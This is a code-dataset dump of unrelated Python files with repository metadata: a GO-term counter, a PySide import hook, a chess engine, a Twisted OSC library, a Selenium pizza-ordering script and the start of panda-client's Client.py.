proporciones = proporciones[::-1]
    # now write it out
results = open(path_output + etiqueta + "_proporciones.txt", "w")
results.write("GO term\t\tocurrencias\n")
for p in proporciones:
results.write("%s\t%d\n" % (p[0], p[1]))
results.close()
| 31.245283 | 159 | 0.667271 | 244 | 1,656 | 4.438525 | 0.491803 | 0.014774 | 0.024007 | 0.038781 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007868 | 0.232488 | 1,656 | 52 | 160 | 31.846154 | 0.844217 | 0.341787 | 0 | 0 | 0 | 0 | 0.166667 | 0.134259 | 0 | 0 | 0 | 0.019231 | 0 | 1 | 0 | false | 0 | 0.137931 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
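The counting step above can be sanity-checked in isolation; a toy example with invented GO terms (true proportions divide by size, as noted in the code):
from __future__ import division
from collections import Counter

terms = ['GO:0008150', 'GO:0003674', 'GO:0008150']
cuentas = Counter(terms)
size = len(terms)
for term, count in cuentas.most_common():
    print(term, count, count / size)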
0e0641eb1c77685ac180e16ede2719bf186f1b48 | 616 | py | Python | acq4/util/PySideImporter.py | aleonlein/acq4 | 4b1fcb9ad2c5e8d4595a2b9cf99d50ece0c0f555 | [
"MIT"
] | 1 | 2020-06-04T17:04:53.000Z | 2020-06-04T17:04:53.000Z | acq4/util/PySideImporter.py | aleonlein/acq4 | 4b1fcb9ad2c5e8d4595a2b9cf99d50ece0c0f555 | [
"MIT"
] | 24 | 2016-09-27T17:25:24.000Z | 2017-03-02T21:00:11.000Z | acq4/util/PySideImporter.py | sensapex/acq4 | 9561ba73caff42c609bd02270527858433862ad8 | [
"MIT"
] | 4 | 2016-10-19T06:39:36.000Z | 2019-09-30T21:06:45.000Z | # -*- coding: utf-8 -*-
from __future__ import print_function
"""This module installs an import hook which overrides PyQt4 imports to pull from
PySide instead. Used for transitioning between the two libraries."""
import imp
class PyQtImporter:
def find_module(self, name, path):
if name == 'PyQt4' and path is None:
print("PyQt4 -> PySide")
self.modData = imp.find_module('PySide')
return self
return None
def load_module(self, name):
return imp.load_module(name, *self.modData)
import sys
sys.meta_path.append(PyQtImporter()) | 29.333333 | 82 | 0.655844 | 79 | 616 | 4.987342 | 0.582278 | 0.050761 | 0.071066 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008677 | 0.251623 | 616 | 21 | 83 | 29.333333 | 0.845987 | 0.034091 | 0 | 0 | 0 | 0 | 0.058691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.384615 | 0.076923 | 0.846154 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
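The imp-based hook above only works on Python 2; on Python 3 the analogous hook would use importlib. A hedged sketch (the legacy find_module/load_module finder protocol shown here was removed in Python 3.12):
import importlib
import sys

class PyQtFinder(object):
    def find_module(self, name, path=None):
        if name == 'PyQt4' and path is None:
            return self
        return None
    def load_module(self, name):
        module = importlib.import_module('PySide')  # redirect the import
        sys.modules[name] = module
        return module

sys.meta_path.append(PyQtFinder())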
0e09835187c4782a7d307df7391d9bcf5ed91648 | 14,774 | py | Python | PythonChessEnviroment.py | teleansh/PythonChessEnviorment | cd19a9148a0da8e69c0efcf21dd559ab2084e07a | [
"MIT"
] | null | null | null | PythonChessEnviroment.py | teleansh/PythonChessEnviorment | cd19a9148a0da8e69c0efcf21dd559ab2084e07a | [
"MIT"
] | 1 | 2022-03-08T16:16:26.000Z | 2022-03-08T16:16:26.000Z | PythonChessEnviroment.py | teleansh/PythonChessEnviorment | cd19a9148a0da8e69c0efcf21dd559ab2084e07a | [
"MIT"
] | null | null | null | b = "r n b q k b n r p p p p p p p p".split(" ") + ['.']*32 + "p p p p p p p p r n b q k b n r".upper().split(" ")
def newBoard():
    global b  # without this, the assignment below would only create a local variable
    b = "r n b q k b n r p p p p p p p p".split(" ") + ['.']*32 + "p p p p p p p p r n b q k b n r".upper().split(" ")
def display(): #white side view
c , k= 1 ,0
ap = range(1,9)[::-1]
row,col=[],[]
for i in b:
row.append(i)
if c==8 :
c=0
col.append(row)
row=[]
c+=1
for j in col[::-1]:
print(ap[k] , " |" ,end=" ")
for i in j:
print(i,end=' ')
print()
k+=1
print(" ",end="")
print("-"*18," A B C D E F G H",sep="\n")
def move(fr,to):
fnum = (conv(fr))-1
tnum = (conv(to))-1
b[fnum], b[tnum] = '.',b[fnum]
display()
def conv(s):
num = int(s[1])
alp = s[0]
a = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8}
alpn = a[alp]
return ((num-1)*8)+alpn
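# For reference (illustrative values): conv('a1') == 1, conv('h1') == 8,
# conv('a2') == 9 and conv('h8') == 64; callers subtract 1 to index the board list.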
def rookValid(fr,to):
    fnum = (conv(fr))-1
    tnum = (conv(to))-1
    if not addressValid(fnum,tnum) or fnum == tnum: return False
    con1,con2,con3=False,False,False
    if abs(fnum-tnum)%8==0:
        con1=True
    if fnum//8 == tnum//8: # both squares on the same rank
        con2=True
    if con2: # verifies the path is clear when fr and to are in the same row
        for l in range(min(fnum,tnum)+1,max(fnum,tnum)):
            if b[l] != '.':
                con2=False
    if con1: # verifies the path is clear when fr and to are in the same column
        mi = min(fnum,tnum)+8
        ma = max(fnum,tnum)
        while mi < ma:
            if b[mi] !='.':
                con1=False
            mi+=8
    if (b[fnum].isupper() and not b[tnum].isupper()) or (b[fnum].islower() and not b[tnum].islower()) : con3 = True
    return (con1 or con2) and con3
def kingValid(fr,to):
    fnum = (conv(fr))-1
    tnum = (conv(to))-1
    if not addressValid(fnum,tnum): return False
    con1,con2=False,False
    val = [fnum+8, fnum-8]          # vertical steps are always candidates
    if fnum%8!=0:                   # not on the a-file: may step left
        val += [fnum-1, fnum+7, fnum-9]
    if fnum%8!=7:                   # not on the h-file: may step right
        val += [fnum+1, fnum+9, fnum-7]
    if tnum in val : con1=True
    if (b[fnum].isupper() and not b[tnum].isupper()) or (b[fnum].islower() and not b[tnum].islower()) : con2 = True
    return con1 and con2
def pawnValid(fr,to):
    fnum = (conv(fr))-1
    tnum = (conv(to))-1
    if not addressValid(fnum,tnum): return False
    if b[fnum].isupper() : c='b'
    elif b[fnum].islower() : c='w'
    else: return False
    if c=='w':
        vm = []
        if b[fnum+8]=='.': vm.append(fnum+8)                                     # single push
        if fnum in range(8,16) and b[fnum+8]=='.' and b[fnum+16]=='.': vm.append(fnum+16)  # double push from rank 2
        if fnum%8!=7 and b[fnum+9].isupper(): vm.append(fnum+9)                  # capture up-right
        if fnum%8!=0 and b[fnum+7].isupper(): vm.append(fnum+7)                  # capture up-left
        return tnum in vm
    if c=='b':
        vm = []
        if b[fnum-8]=='.': vm.append(fnum-8)                                     # single push
        if fnum in range(48,56) and b[fnum-8]=='.' and b[fnum-16]=='.': vm.append(fnum-16) # double push from rank 7
        if fnum%8!=0 and b[fnum-9].islower(): vm.append(fnum-9)                  # capture down-left
        if fnum%8!=7 and b[fnum-7].islower(): vm.append(fnum-7)                  # capture down-right
        return tnum in vm
def bishopValid(fr,to):
    fnum = (conv(fr))-1
    tnum = (conv(to))-1
    if not addressValid(fnum,tnum) or fnum == tnum: return False
    con1,con2=False,False
    diff = tnum - fnum
    # a diagonal move changes rank and file by the same amount
    if abs(diff)%9==0 and abs(fnum%8 - tnum%8) == abs(diff)//9:
        step = 9 if diff > 0 else -9
        con1 = True
    elif abs(diff)%7==0 and abs(fnum%8 - tnum%8) == abs(diff)//7:
        step = 7 if diff > 0 else -7
        con1 = True
    if con1: # every square strictly between the two must be empty
        sq = fnum + step
        while sq != tnum:
            if b[sq] != '.' : return False
            sq += step
    if (b[fnum].isupper() and not b[tnum].isupper()) or (b[fnum].islower() and not b[tnum].islower()) : con2 = True
    return con1 and con2
def queenValid(fr,to):
fnum = (conv(fr))-1
tnum = (conv(to))-1
if not addressValid(fnum,tnum): return False
return bishopValid(fr,to) or rookValid(fr,to)
def knightValid(fr,to):
    fnum = (conv(fr))-1
    tnum = (conv(to))-1
    if not addressValid(fnum,tnum): return False
    con1,con2=False,False
    if tnum in [fnum+17,fnum-17,fnum+15,fnum-15,fnum+10,fnum-6,fnum+6,fnum-10] and abs(fnum%8 - tnum%8) <= 2: con1=True
    if (b[fnum].isupper() and not b[tnum].isupper()) or (b[fnum].islower() and not b[tnum].islower()) : con2=True
    return con1 and con2
def addressValid(fnum,tnum):
return 0<=fnum<64 and 0<=tnum<64
def rookMoves(pos):
num=(conv(pos))-1 #num is index
if b[num].isupper() : c='b'
elif b[num].islower() : c='w'
else: return "Block is empty"
vm=[]
col=(num+1)%8
if col==0: col=8
row=int(pos[1])
if c=='w':
block=num+8
        while row<8: # stop at rank 8; <=8 would step past the board edge
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block+=8
row+=1
row=int(pos[1])
block=num-8
        while row>1: # stop at rank 1; >0 would step below the board
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block-=8
row-=1
tcol=col+1 #col is from 1 to 8 , row is from 1 to 8
block =num+1
while tcol<=8:
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block+=1
tcol+=1
block =num-1
tcol=col
while tcol>1:
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block-=1
tcol-=1
tcol=col
row=int(pos[1])
if c=='b':
block=num+8
        while row<8: # stop at rank 8; <=8 would step past the board edge
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block+=8
row+=1
row=int(pos[1])
block=num-8
while row>1:
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block-=8
row-=1
tcol=col+1 #col is from 1 to 8 , row is from 1 to 8
block =num+1
while tcol<=8:
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block+=1
tcol+=1
block =num-1
tcol=col
while tcol>1:
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block-=1
tcol-=1
move=[]
for l in vm:
move.append(numToAlg(l))
return move
def bishopMoves(pos):
num=(conv(pos))-1
if b[num].isupper() : c='b'
elif b[num].islower() : c='w'
else: return "Block is empty"
vm=[]
col=(num+1)%8
if col==0: col=8
row=int(pos[1])+1
if c=='w':
tcol=col+1
row=int(pos[1])+1
block=num+9
        while row<=8 and tcol<=8 : #goes top right
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block+=9
row+=1
tcol+=1
row=int(pos[1])-1
tcol=col-1
block=num-9
        while row>0 and tcol>0: #goes below left (tcol>0 so the a-file square is included)
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block-=9
row-=1
tcol-=1
row=int(pos[1])-1
tcol=col+1
block =num-7
        while tcol<=8 and row>0: #goes below right (row>0 so the first rank is included)
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block-=7
tcol+=1
row-=1
block =num+7
tcol=col-1
row=int(pos[1])+1
while tcol>0 and row<=8: #goes top left
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block+=7
tcol-=1
row+=1
if c=='b':
tcol=col+1
row=int(pos[1])+1
block=num+9
        while row<=8 and tcol<=8 : #goes top right
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block+=9
row+=1
tcol+=1
row=int(pos[1])-1
tcol=col-1
block=num-9
        while row>0 and tcol>0: #goes below left (tcol>0 so the a-file square is included)
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block-=9
row-=1
tcol-=1
row=int(pos[1])-1
tcol=col+1
block =num-7
        while tcol<=8 and row>0: #goes below right (row>0 so the first rank is included)
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block-=7
tcol+=1
row-=1
block =num+7
tcol=col-1
row=int(pos[1])+1
while tcol>0 and row<=8: #goes top left
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
            if b[block].isupper():
break
block+=7
tcol-=1
row+=1
move=[]
for l in vm:
move.append(numToAlg(l))
return move
def queenMoves(pos):
return rookMoves(pos) + bishopMoves(pos)
def knightMoves(pos):
    num = conv(pos)-1 #num is index
    vm = [num-17,num-15,num-10,num-6,num+6,num+10,num+15,num+17]
    tvm=[]
    for i in vm:
        # keep on-board squares whose file shift is a real knight move (filters wrap-around)
        if (i>=0 and i<=63) and abs(num%8 - i%8) <= 2 and not ((b[num].isupper() and b[i].isupper()) or (b[num].islower() and b[i].islower())) : tvm.append(i)
    move=[]
    for l in tvm:
        move.append(numToAlg(l))
    return move
def kingMoves(pos):
    num = conv(pos)-1 #num is index
    vm = [num+8,num-8,num+9,num-9,num+7,num-7,num+1,num-1]
    tvm=[]
    for i in vm:
        # keep on-board squares at most one file away (filters a/h-file wrap-around)
        if (i>=0 and i<=63) and abs(num%8 - i%8) <= 1 and not ((b[num].isupper() and b[i].isupper()) or (b[num].islower() and b[i].islower())) : tvm.append(i)
    move=[]
    for l in tvm:
        move.append(numToAlg(l))
    return move
def pawnMoves(pos):
num = conv(pos)-1
vm=[]
    if b[num].islower() :
        if b[num+8] =='.':vm.append(num+8)
        if num%8!=7 and b[num+9].isupper() : vm.append(num+9)
        if num%8!=0 and b[num+7].isupper() : vm.append(num+7)
        if b[num+16] =='.' and b[num+8]=='.' and 7<num<16 : vm.append(num+16)
    if b[num].isupper() :
        if b[num-8] =='.':vm.append(num-8)
        if num%8!=0 and b[num-9].islower() : vm.append(num-9)
        if num%8!=7 and b[num-7].islower() : vm.append(num-7)
        if b[num-16] =='.' and b[num-8]=='.' and 47<num<56 : vm.append(num-16)
list =[]
for i in vm:
list.append(numToAlg(i))
return list
def moves(pos):
num = conv(pos)-1
if b[num].lower() =='k':
return(kingMoves(pos))
elif b[num].lower() == 'q':
return(queenMoves(pos))
elif b[num].lower() == 'p':
return(pawnMoves(pos))
elif b[num].lower() == 'r':
return(rookMoves(pos))
elif b[num].lower() == 'b':
return(bishopMoves(pos))
elif b[num].lower() == 'n':
return(knightMoves(pos))
def isCheck(pos):
    num = conv(pos)-1
    r = rookMoves(pos)
    dg = bishopMoves(pos) # renamed from b so the global board b is not shadowed
    n = knightMoves(pos)
    check = False
    for rcase in r:
        if b[conv(rcase)-1].lower() in ['r','q'] and ( (b[num].islower() and b[conv(rcase)-1].isupper()) or (b[num].isupper() and b[conv(rcase)-1].islower()) ) : check=True
    for bcase in dg:
        if b[conv(bcase)-1].lower() in ['b','q'] and ( (b[num].islower() and b[conv(bcase)-1].isupper()) or (b[num].isupper() and b[conv(bcase)-1].islower()) ): check=True
    for kcase in n:
        if b[conv(kcase)-1].lower()=='n' and ( (b[num].islower() and b[conv(kcase)-1].isupper()) or (b[num].isupper() and b[conv(kcase)-1].islower()) ): check=True
    return check
def numToAlg(ind):
alp=(ind+1)%8
n=((ind+1)//8) + 1
if alp==0:
n-=1
a = {0:'h',1 : 'a' , 2:'b',3:'c',4:'d',5:'e',6:'f',7:'g',8:'h'}
return str(a[alp]) + str(n)
| 26.66787 | 173 | 0.425274 | 2,052 | 14,774 | 3.061891 | 0.066277 | 0.037243 | 0.061117 | 0.012733 | 0.742321 | 0.686774 | 0.672609 | 0.663855 | 0.635206 | 0.635206 | 0 | 0.048368 | 0.41925 | 14,774 | 553 | 174 | 26.716094 | 0.683916 | 0.020306 | 0 | 0.662844 | 0 | 0 | 0.018337 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045872 | false | 0 | 0 | 0.004587 | 0.080275 | 0.011468 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
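A short illustrative session exercising the board API above; the opening moves are arbitrary.
display()                  # print the starting position
print(moves('e2'))         # pawn options, e.g. ['e3', 'e4']
move('e2', 'e4')           # white pushes the king's pawn
move('e7', 'e5')           # black replies in kind
print(moves('g1'))         # knight development squares, e.g. ['f3', 'h3']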
0e0d7b53e41d2bf0a7a2e0799a229887f7c07708 | 5,408 | py | Python | txosc/async.py | oubiwann/txosc | 6560a0dc9ef564d785170d4529967599455e4f3e | [
"MIT"
] | 1 | 2018-02-11T07:34:29.000Z | 2018-02-11T07:34:29.000Z | txosc/async.py | oubiwann/txosc | 6560a0dc9ef564d785170d4529967599455e4f3e | [
"MIT"
] | 1 | 2019-01-14T22:42:45.000Z | 2019-01-14T22:42:45.000Z | txosc/async.py | oubiwann/txosc | 6560a0dc9ef564d785170d4529967599455e4f3e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- test-case-name: txosc.test.test_async -*-
# Copyright (c) 2009 Alexandre Quessy, Arjan Scherpenisse
# See LICENSE for details.
"""
Asynchronous OSC sender and receiver using Twisted
"""
import struct
import socket
from twisted.internet import defer, protocol
from twisted.application.internet import MulticastServer
from txosc.osc import *
from txosc.osc import _elementFromBinary
#
# Stream based client/server protocols
#
class StreamBasedProtocol(protocol.Protocol):
"""
OSC over TCP sending and receiving protocol.
"""
def connectionMade(self):
self.factory.connectedProtocol = self
if hasattr(self.factory, 'deferred'):
self.factory.deferred.callback(True)
self._buffer = ""
self._pkgLen = None
def dataReceived(self, data):
"""
Called whenever data is received.
In a stream-based protocol such as TCP, the stream should
begin with an int32 giving the size of the first packet,
followed by the contents of the first packet, followed by the
size of the second packet, etc.
@type data: L{str}
"""
self._buffer += data
if len(self._buffer) < 4:
return
if self._pkgLen is None:
self._pkgLen = struct.unpack(">i", self._buffer[:4])[0]
if len(self._buffer) < self._pkgLen + 4:
print "waiting for %d more bytes" % (self._pkgLen + 4 - len(self._buffer))
return
payload = self._buffer[4:4 + self._pkgLen]
self._buffer = self._buffer[4 + self._pkgLen:]
self._pkgLen = None
if payload:
element = _elementFromBinary(payload)
self.factory.gotElement(element)
if len(self._buffer):
self.dataReceived("")
def send(self, element):
"""
Send an OSC element over the TCP wire.
@param element: L{txosc.osc.Message} or L{txosc.osc.Bundle}
"""
binary = element.toBinary()
self.transport.write(struct.pack(">i", len(binary)) + binary)
#TODO: return a Deferred
class StreamBasedFactory(object):
"""
Factory object for the sending and receiving of elements in a
stream-based protocol (e.g. TCP, serial).
@ivar receiver: A L{Receiver} object which is used to dispatch
incoming messages to.
@ivar connectedProtocol: An instance of L{StreamBasedProtocol}
representing the current connection.
"""
receiver = None
connectedProtocol = None
def __init__(self, receiver=None):
if receiver:
self.receiver = receiver
def send(self, element):
self.connectedProtocol.send(element)
def gotElement(self, element):
if self.receiver:
self.receiver.dispatch(element, self)
else:
raise OscError("Element received, but no Receiver in place: " + str(element))
def __str__(self):
return str(self.connectedProtocol.transport.client)
class ClientFactory(protocol.ClientFactory, StreamBasedFactory):
"""
TCP client factory
"""
protocol = StreamBasedProtocol
def __init__(self, receiver=None):
StreamBasedFactory.__init__(self, receiver)
self.deferred = defer.Deferred()
class ServerFactory(protocol.ServerFactory, StreamBasedFactory):
"""
TCP server factory
"""
protocol = StreamBasedProtocol
#
# Datagram client/server protocols
#
class DatagramServerProtocol(protocol.DatagramProtocol):
"""
The UDP OSC server protocol.
@ivar receiver: The L{Receiver} instance to dispatch received
elements to.
"""
def __init__(self, receiver):
"""
@param receiver: L{Receiver} instance.
"""
self.receiver = receiver
def datagramReceived(self, data, (host, port)):
element = _elementFromBinary(data)
self.receiver.dispatch(element, (host, port))
class MulticastDatagramServerProtocol(DatagramServerProtocol):
"""
UDP OSC server protocol that can listen to multicast.
    Here is an example of how to use it:
reactor.listenMulticast(8005, MulticastServerUDP(receiver, "224.0.0.1"), listenMultiple=True)
This way, many listeners can listen on the same port, same host, to the same multicast group. (in this case, the 224.0.0.1 multicast group)
"""
def __init__(self, receiver, multicast_addr="224.0.0.1"):
"""
@param multicast_addr: IP address of the multicast group.
@param receiver: L{txosc.dispatch.Receiver} instance.
@type multicast_addr: str
@type receiver: L{txosc.dispatch.Receiver}
"""
self.multicast_addr = multicast_addr
DatagramServerProtocol.__init__(self, receiver)
def startProtocol(self):
"""
Join a specific multicast group, which is the IP we will respond to
"""
self.transport.joinGroup(self.multicast_addr)
class DatagramClientProtocol(protocol.DatagramProtocol):
"""
The UDP OSC client protocol.
"""
def send(self, element, (host, port)):
"""
Send a L{txosc.osc.Message} or L{txosc.osc.Bundle} to the address specified.
@type element: L{txosc.osc.Message}
"""
data = element.toBinary()
self.transport.write(data, (socket.gethostbyname(host), port))
| 28.765957 | 143 | 0.645895 | 616 | 5,408 | 5.579545 | 0.301948 | 0.038406 | 0.027931 | 0.022112 | 0.137911 | 0.036078 | 0.036078 | 0.019203 | 0.019203 | 0 | 0 | 0.008953 | 0.256472 | 5,408 | 187 | 144 | 28.919786 | 0.84581 | 0.044379 | 0 | 0.169014 | 0 | 0 | 0.028958 | 0 | 0 | 0 | 0 | 0.005348 | 0 | 0 | null | null | 0 | 0.084507 | null | null | 0.014085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
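A hedged sketch of wiring the datagram protocols above into a reactor; the receiver comes from txosc.dispatch as referenced in the docstrings, and the port numbers are arbitrary.
from twisted.internet import reactor
from txosc import dispatch

receiver = dispatch.Receiver()
reactor.listenUDP(17779, DatagramServerProtocol(receiver))   # server side
client = DatagramClientProtocol()
reactor.listenUDP(0, client)                                 # client on any free port
reactor.callLater(0, client.send, Message("/ping"), ("127.0.0.1", 17779))
reactor.run()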
0e0f6259ba624db7fa0c2c5d4fdc06aa5c711408 | 2,740 | py | Python | main.py | theIsaacLim/hakdPizza | 0471dc6ee9fc049bd10f0a8aa9d707f2c0388fc5 | [
"MIT"
] | null | null | null | main.py | theIsaacLim/hakdPizza | 0471dc6ee9fc049bd10f0a8aa9d707f2c0388fc5 | [
"MIT"
] | null | null | null | main.py | theIsaacLim/hakdPizza | 0471dc6ee9fc049bd10f0a8aa9d707f2c0388fc5 | [
"MIT"
] | null | null | null | from selenium import webdriver
from time import sleep # Sleep will pause the program
import os # for getting the local path
from json import loads
dirpath = os.getcwd() # gets local path
driver = webdriver.Chrome(dirpath + "/chromedriver")
def login(username, password):
global driver
# LOGIN
driver.find_element_by_css_selector(".header-login > span:nth-child(1)").click() # Click login button
usernameField, passwordField = driver.find_element_by_css_selector("#txt-ac-userName"), driver.find_element_by_css_selector("#txt-ac-passWord")
usernameField.send_keys(username)
passwordField.send_keys(password)
loginButton = driver.find_element_by_css_selector("#main > div > div.body > div > div:nth-child(1) > div.operator-bar > div")
loginButton.click()
sleep(4)
def addPizzaToCart(pizzaName, size):
global driver
pizzaText = driver.find_element_by_xpath('//div[text() = "{}"]'.format(pizzaName)) # uses xpath to select the pizza label element
# Here, we have the label that says what pizza it is
# This isn't what we want though
#
# We want to click the button that says to buy
# To do that, we have to have a look at the actual structure of the page
# The label and the button are all wrapped in a bigger div. We can get the button by finding
    # the label's parent and getting its child, the button
#
# That's essentially what the following code does
containerDiv = pizzaText.find_element_by_xpath('..')
button = containerDiv.find_element_by_css_selector("a[data-mltext='p-buy']")
buttonWrapperSpan = button.find_element_by_xpath('..')
# Okay so what happens here is that it should in theory open up a modal window that allows you to tick certain options
scriptFunction = buttonWrapperSpan.get_attribute('onclick') # This is the function that opens the modal window
driver.execute_script(scriptFunction) # Execute that function
sleep(5)
driver.switch_to.frame("iframe")
driver.execute_script("SizeClick('{}');".format(size))
driver.execute_script("AddShoppingCar();")
def checkout():
driver.get("http://www.dominos.com.cn/order/cart.html")
driver.execute_script("ConfirmOrder();")
# GET PAGE AND CHANGE LANGUAGE TO ENGLISH
driver.get("http://www.dominos.com.cn/menu/menu.html?menuIndex=0&RNDSEED=c42905609c237eff75c1bd6767345f43") # dominos menu page
login("username", "password")
english = driver.find_element_by_css_selector('#lanEn > a')
english.click() # click on english to change the language
sleep(7) # Wait for the website to update
rawText = open("order.json").read()
orderDict = loads(rawText)
for order in orderDict:
addPizzaToCart(order["name"], order["size"])
sleep(2)
| 42.153846 | 147 | 0.729562 | 389 | 2,740 | 5.033419 | 0.421594 | 0.050562 | 0.059755 | 0.058223 | 0.122574 | 0.110317 | 0.064351 | 0.035751 | 0 | 0 | 0 | 0.013089 | 0.163504 | 2,740 | 64 | 148 | 42.8125 | 0.841187 | 0.309854 | 0 | 0.05 | 0 | 0.05 | 0.232994 | 0.011784 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0.1 | 0.1 | 0 | 0.175 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
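The loop above implies order.json is a list of objects with "name" and "size" keys; the exact schema isn't shown, so the following contents are a plausible, invented example.
# order.json (hypothetical):
# [
#   {"name": "Super Supreme", "size": "9-inch"},
#   {"name": "Hawaiian", "size": "12-inch"}
# ]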
0e0fc6085ae3cea9518a28dc404a0b76c2ffa235 | 127,770 | py | Python | pandatools/Client.py | Jon-Burr/panda-client | ff7ee8fc8481537cf604d983340eda102f041a20 | [
"Apache-2.0"
] | null | null | null | pandatools/Client.py | Jon-Burr/panda-client | ff7ee8fc8481537cf604d983340eda102f041a20 | [
"Apache-2.0"
] | null | null | null | pandatools/Client.py | Jon-Burr/panda-client | ff7ee8fc8481537cf604d983340eda102f041a20 | [
"Apache-2.0"
] | null | null | null | '''
client methods
'''
import os
if os.environ.has_key('PANDA_DEBUG'):
print "DEBUG : importing %s" % __name__
import re
import sys
import time
import stat
import types
try:
import json
except:
import simplejson as json
import random
import urllib
import struct
import commands
import cPickle as pickle
import xml.dom.minidom
import socket
import tempfile
import MiscUtils
import PLogger
# configuration
try:
baseURL = os.environ['PANDA_URL']
except:
baseURL = 'http://pandaserver.cern.ch:25080/server/panda'
try:
baseURLSSL = os.environ['PANDA_URL_SSL']
except:
baseURLSSL = 'https://pandaserver.cern.ch:25443/server/panda'
baseURLDQ2 = 'http://atlddmcat-reader.cern.ch/dq2'
baseURLDQ2SSL = 'https://atlddmcat-writer.cern.ch:443/dq2'
baseURLSUB = "http://pandaserver.cern.ch:25080/trf/user"
baseURLMON = "http://panda.cern.ch:25980/server/pandamon/query"
baseURLCSRV = "http://pandacache.cern.ch:25080/server/panda"
baseURLCSRVSSL = "http://pandacache.cern.ch:25443/server/panda"
#baseURLCSRV = "http://aipanda011.cern.ch:25080/server/panda"
#baseURLCSRVSSL = "http://aipanda011.cern.ch:25443/server/panda"
# exit code
EC_Failed = 255
# default max size per job
maxTotalSize = long(14*1024*1024*1024)
# safety size for input size calculation
safetySize = long(500*1024*1024)
# suffix for shadow dataset
suffixShadow = "_shadow"
# limit on maxCpuCount
maxCpuCountLimit = 1000000000
# retrieve pathena config
try:
# get default timeout
defTimeOut = socket.getdefaulttimeout()
# set timeout
socket.setdefaulttimeout(60)
except:
pass
if os.environ.has_key('PANDA_DEBUG'):
print "DEBUG : getting panda cache server's name"
# get panda cache server's name
try:
getServerURL = baseURLCSRV + '/getServer'
res = urllib.urlopen(getServerURL)
# overwrite URL
baseURLCSRVSSL = "https://%s/server/panda" % res.read()
except:
type, value, traceBack = sys.exc_info()
print type,value
print "ERROR : could not getServer from %s" % getServerURL
sys.exit(EC_Failed)
try:
# reset timeout
socket.setdefaulttimeout(defTimeOut)
except:
pass
if os.environ.has_key('PANDA_DEBUG'):
print "DEBUG : ready"
# look for a grid proxy certificate
def _x509():
# see X509_USER_PROXY
try:
return os.environ['X509_USER_PROXY']
except:
pass
# see the default place
x509 = '/tmp/x509up_u%s' % os.getuid()
if os.access(x509,os.R_OK):
return x509
# no valid proxy certificate
# FIXME
print "No valid grid proxy certificate found"
return ''
# look for a CA certificate directory
def _x509_CApath():
# use X509_CERT_DIR
try:
return os.environ['X509_CERT_DIR']
except:
pass
# get X509_CERT_DIR
gridSrc = _getGridSrc()
com = "%s echo $X509_CERT_DIR" % gridSrc
tmpOut = commands.getoutput(com)
return tmpOut.split('\n')[-1]
# keep list of tmp files for cleanup
globalTmpDir = ''
# curl class
class _Curl:
# constructor
def __init__(self):
# path to curl
self.path = 'curl --user-agent "dqcurl" '
# verification of the host certificate
self.verifyHost = True
# request a compressed response
self.compress = True
# SSL cert/key
self.sslCert = ''
self.sslKey = ''
# verbose
self.verbose = False
# GET method
def get(self,url,data,rucioAccount=False):
# make command
